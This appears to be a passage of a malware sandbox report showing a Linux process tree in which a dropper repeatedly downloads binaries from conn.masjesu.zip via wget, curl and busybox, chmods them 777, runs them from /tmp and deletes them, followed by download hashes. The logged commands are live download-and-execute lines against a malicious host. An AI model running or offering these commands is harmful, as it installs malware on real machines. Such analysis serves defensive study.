/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:937
-
-
/bin/chmodchmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK2⤵PID:940
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:941
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- System Network Configuration Discovery
PID:944
-
-
/bin/chmodchmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu42⤵PID:947
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- System Network Configuration Discovery
PID:948
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- System Network Configuration Discovery
PID:951
-
-
/bin/chmodchmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir2⤵PID:954
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- System Network Configuration Discovery
PID:955
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- System Network Configuration Discovery
PID:958
-
-
/bin/chmodchmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C2⤵PID:961
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:962
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- System Network Configuration Discovery
PID:965
-
-
/bin/chmodchmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:968
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- System Network Configuration Discovery
PID:969
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- System Network Configuration Discovery
PID:972
-
-
/bin/chmodchmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:975
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- System Network Configuration Discovery
PID:976
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- System Network Configuration Discovery
PID:979
-
-
/bin/chmodchmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:982
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- System Network Configuration Discovery
PID:983
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- System Network Configuration Discovery
PID:986
-
-
/bin/chmodchmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:989
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- System Network Configuration Discovery
PID:990
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:991
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- System Network Configuration Discovery
PID:993
-
-
/bin/chmodchmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Executes dropped EXE
PID:995
-
-
/bin/rmrm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:996
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- System Network Configuration Discovery
PID:997
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:998
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- System Network Configuration Discovery
PID:1000
-
-
/bin/chmodchmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- File and Directory Permissions Modification
PID:1001
-
-
/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Executes dropped EXE
PID:1002
-
-
/bin/rmrm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:1003
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97